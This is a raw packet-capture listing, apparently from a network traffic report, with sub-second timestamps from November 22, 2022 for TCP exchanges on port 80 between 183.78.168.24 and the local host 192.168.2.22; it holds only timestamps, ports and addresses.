                                                                                Nov 22, 2022 05:09:13.343179941 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.343302011 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.343354940 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.344918013 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.344959021 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.345033884 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.373528004 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.373590946 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.373636007 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.373687983 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.373703957 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.373754978 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.373800993 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.373814106 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.373855114 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.373894930 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.373940945 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.374430895 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.374507904 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.374547958 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.374602079 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.374660969 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.374789953 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.374840021 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.374851942 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.374962091 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.375003099 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.375024080 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.376389027 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.376429081 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.376446962 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.376569986 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.376620054 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.376631975 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.378216982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.378257036 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.378319025 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.378371000 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.378449917 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.378506899 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.490065098 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490125895 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490160942 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490190983 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490231991 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490272045 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490304947 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.490375042 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490416050 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490447044 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490556955 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490603924 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.490664959 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490746021 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490792990 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.490803957 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.490926027 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.491036892 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.491077900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.491096973 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.491139889 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.491193056 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.491271973 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.491332054 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.491400957 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.491458893 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.491561890 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.491616964 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.491674900 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.494936943 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.494982958 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.495076895 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.495100975 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.495194912 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.495244026 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.495431900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.495548010 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.495606899 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.495659113 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.495699883 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.495753050 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.496992111 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.497030973 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.497169018 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.497220039 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.497298002 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.497380972 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.497417927 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.497493982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.497592926 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.498960972 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.499003887 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.499067068 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.528146982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.528207064 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.528247118 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.528274059 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.528326035 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.528363943 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.528383970 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.528426886 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.528466940 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.528484106 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.528522968 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.528565884 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.528666973 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.528708935 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.528764009 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.528810024 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.528913975 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.528961897 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.529005051 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.529149055 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.529248953 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.530514956 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.530558109 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.530663967 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.530709982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.530750036 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.530889988 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.532390118 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.532434940 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.532495975 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.532552004 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.532632113 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.532691956 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.532747984 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.532831907 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.532891035 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.644699097 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.644768000 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.644817114 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.644855976 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.644884109 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.644934893 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.644985914 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.644998074 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.645039082 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.645085096 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.645096064 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.645136118 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.645181894 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.645194054 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.645313025 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.645353079 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.645373106 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.645414114 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.645551920 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.645605087 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.645648003 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.645721912 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.645772934 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.645833015 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.645874023 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.645926952 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.646003008 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.646136045 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.646176100 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.646222115 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.646234035 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.649190903 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.649234056 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.649307966 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.649352074 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.649390936 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.649682999 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.649734974 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.649790049 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.649832010 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.649908066 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.649955034 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.651026011 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.651071072 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.651125908 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.651284933 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.651325941 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.651453018 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.651498079 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.651519060 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.652956963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.653043985 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.653109074 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.682907104 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.682972908 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.683056116 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.683080912 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.683130026 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.683168888 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.683192015 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.683232069 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.683273077 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.683319092 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.683330059 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.683370113 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.683413029 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.683512926 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.683552980 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.683602095 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.683618069 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.683697939 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.683738947 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.683794022 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.684760094 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.684803963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.684849024 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.684897900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.684937000 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.684953928 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.686408043 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.686461926 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.686516047 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.686600924 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.686665058 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.686723948 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.686866999 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.686942101 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.686954021 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.799308062 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.799365997 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.799407959 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.799443960 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.799489021 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.799530029 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.799576998 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.799592018 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.799634933 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.799674034 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.799721003 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.799813986 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.799854040 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.799904108 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.799969912 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.800045967 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.800120115 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.800174952 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.800237894 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.800277948 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.800332069 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.800407887 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.800494909 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.800553083 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.800611019 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.800689936 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.800771952 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.800827980 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.803427935 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.803508997 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.803549051 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.803586006 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.803637028 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.803682089 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.803772926 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.803838015 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.803908110 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.803955078 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.803997993 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.804075003 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.804105997 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.804213047 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.804326057 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.804938078 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.805001974 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.805062056 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.805633068 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.805728912 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.805779934 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.807230949 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.807271957 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.807328939 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.807380915 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.807457924 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.807542086 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.837685108 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.837748051 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.837779999 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.837825060 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.837863922 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.837903023 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.837954998 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.837973118 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.837973118 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.838030100 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.838069916 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.838089943 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.838131905 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.838344097 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.838387012 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.838406086 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.838712931 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.838757992 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.838800907 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.838861942 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.838968992 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.839034081 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.840362072 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.840404987 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.840480089 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.840574980 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.840708971 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.840842009 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.840881109 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.840899944 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.953924894 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.953986883 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.954029083 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.954066992 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.954108953 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.954149008 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.954189062 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.954211950 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.954334021 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.954374075 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.954394102 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.954473972 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.954530954 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.954571009 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.954699993 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.954756021 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.954778910 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.954855919 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.954966068 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.955008030 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.955029964 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.955073118 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.955141068 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.955171108 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.955246925 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.955322027 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.955391884 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.955434084 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.955508947 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.955574989 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.955635071 CET8049175183.78.168.24192.168.2.22
